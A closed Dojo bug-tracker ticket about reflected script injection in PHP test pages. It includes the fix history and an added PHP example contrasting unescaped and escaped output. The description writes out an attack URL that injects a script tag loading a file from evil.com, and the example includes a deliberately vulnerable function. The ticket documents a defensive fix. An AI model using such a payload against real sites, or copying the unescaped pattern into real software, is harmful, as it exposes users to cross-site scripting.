Opened 8 years ago

Closed 8 years ago

#13674 closed defect (fixed)

borderContainer.php should not allow script attacks

Reported by: Douglas Hays
Owned by: bill
Priority: high
Milestone: 1.7
Component: Dijit
Version: 1.4.0
Keywords: (none)
Cc: Colin Snover
Blocked By: (none)
Blocking: (none)

Description

We need to plug this security hole:

http://projecttests.customer.com/dojo1.7/dijit/tests/layout/borderContainer.php?id=<script src=http://evil.com/xss/hack.js></script>

Change History (7)

comment:1 Changed 8 years ago by Revin Guillen

In [26183]:

Plug script injection holes in a couple of tests, refs #13674

comment:2 Changed 8 years ago by Revin Guillen

In [26184]:

Plug script injection hole in the _base timeout.php test, refs #13674

comment:3 Changed 8 years ago by Revin Guillen

OK I fixed the places I found in tests where we sent unescaped input out to the browser. There are a few more PHP scripts in the toolkit that do it, in demos and util, but it wasn't clear whether those were really in scope here or what. I may have overstepped by fixing three files as it is.

These are all I have time for right this minute, so if somebody else wants to check those out, be my guest :-)

comment:4 Changed 8 years ago by Douglas Hays

revin, thanks for fixing these. I also see
demos/uploader/UploadFile.php
docscripts/dumpObj.php
Are these the others that you saw? Maybe these should be fixed as well for completeness.

comment:5 Changed 8 years ago by Revin Guillen

In [26607]:

Escape output for HTML, refs #13674

comment:6 Changed 8 years ago by Revin Guillen

In [26609]:

Escape output for HTML, refs #13674
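The pattern behind comment 3 ("sent unescaped input out to the browser") and the "Escape output for HTML" commits, as an added illustration rather than code from the dojo tests themselves. It assumes, as the URL in the description shows, that the page takes an `id` query parameter and writes it into the markup it serves; the function names, the attribute context, and the sample input are all constructed for this example.

```php
<?php
// Added illustration (not dojo's own test code): a page that reads ?id=...
// and writes it into the HTML it serves, shown unescaped and then fixed.

// VULNERABLE: $id is concatenated into the markup as-is, so any tags in the
// query string become part of the page (reflected script injection).
function render_unescaped(string $id): string
{
    return "<div id=\"$id\" class=\"dijitBorderContainer\"></div>";
}

// FIXED: escape for the HTML context before output. ENT_QUOTES also escapes
// single quotes, so the value is safe inside either attribute quote style;
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning "";
// the explicit charset avoids multibyte surprises.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_escaped(string $id): string
{
    return '<div id="' . esc($id) . '" class="dijitBorderContainer"></div>';
}

// Quick check used below: does the rendered HTML still contain a raw
// <script tag? Escaped output never will, because "<" became "&lt;".
function contains_raw_script_tag(string $html): bool
{
    return (bool) preg_match('/<script\b/i', $html);
}

// Constructed sample input standing in for the query-string value in the
// ticket's URL (hostname is a reserved example name, not a real site).
$sample = '<script src=http://example.invalid/x.js></script>';

// On the command line use the sample; under a web server use the real parameter.
$id = (PHP_SAPI === 'cli' || !isset($_GET['id'])) ? $sample : $_GET['id'];

echo render_escaped($id), "\n";

// Compare the two renderings on the sample input.
var_dump(contains_raw_script_tag(render_unescaped($sample)));
var_dump(contains_raw_script_tag(render_escaped($sample)));
```

`htmlspecialchars()` is the right tool only because the value lands in a quoted HTML attribute or element body. An unquoted attribute (`id=$id`) would still be injectable via a space, and a value written into a JavaScript string or a URL needs that context's own encoding, so the escape has to match where the output actually goes.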

comment:7 Changed 8 years ago by Revin Guillen

Resolution: fixed
Status: new → closed